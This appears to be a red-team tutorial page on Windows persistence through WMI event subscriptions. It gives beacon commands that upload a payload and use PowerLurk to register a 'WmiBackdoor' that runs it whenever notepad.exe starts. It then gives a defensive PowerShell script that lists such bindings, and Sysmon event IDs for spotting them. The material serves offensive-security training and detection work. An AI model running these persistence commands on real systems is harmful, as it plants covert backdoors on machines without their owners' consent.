Requirements

High integrity or SYSTEM

In order to maintain persistence through WMI, we need three classes:

  1. EventConsumer: the action to take (e.g. execute a payload: PowerShell, VBScript, etc.)
  2. EventFilter: a filter (WQL query) that defines which event to act on
  3. FilterToConsumerBinding: links the EventFilter to the EventConsumer

We can build these WMI classes using PowerLurk.

Demonstration

beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe, and the query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

To remove the backdoor:

Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
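The same three classes are what a defender hunts for. The script below is an added example, not part of the original notes or of PowerLurk: it uses only the built-in WMI cmdlets to walk every __FilterToConsumerBinding in root\subscription and pair it with its filter query and consumer action, flagging bindings whose consumer class can execute commands or script. It assumes an elevated PowerShell session on the host being examined.

```powershell
# Added example (not from the original page): enumerate permanent WMI event
# subscriptions and show the filter/consumer pair behind each binding, which is
# exactly what Register-MaliciousWmiEvent leaves behind.
# Assumes built-in WMI cmdlets and an elevated session; no third-party modules.
$ns = 'root\subscription'

$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
$consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # base class: returns all consumer types
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

# Consumer classes that run arbitrary commands or script on the host.
$execConsumers = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')

foreach ($b in $bindings) {
    # Filter / Consumer are reference paths such as __EventFilter.Name="WmiBackdoor";
    # the quoted Name is the key used to match them to their objects.
    $filterName   = ($b.Filter   -split '"')[1]
    $consumerName = ($b.Consumer -split '"')[1]

    $f = $filters   | Where-Object Name -eq $filterName
    $c = $consumers | Where-Object Name -eq $consumerName

    # What the consumer does depends on its class: a command line or inline script.
    $action = if ($c.__CLASS -eq 'CommandLineEventConsumer') { $c.CommandLineTemplate }
              elseif ($c.__CLASS -eq 'ActiveScriptEventConsumer') { $c.ScriptText }
              else { '(no command execution)' }

    [pscustomobject]@{
        Binding       = $filterName
        FilterQuery   = $f.Query
        ConsumerClass = $c.__CLASS
        Action        = $action
        # A process-start (or other) trigger wired to an executing consumer needs review.
        # The default "SCM Event Log Filter" -> NTEventLogEventConsumer pair is benign baseline.
        ReviewNeeded  = ($execConsumers -contains $c.__CLASS)
    }
}
```

For the demonstration above, the output row for WmiBackdoor shows the Win32_ProcessStartTrace query, a CommandLineEventConsumer and C:\Windows\dns_x64.exe as the action; Sysmon event IDs 19, 20 and 21 record the creation of the same three classes at the time they are registered.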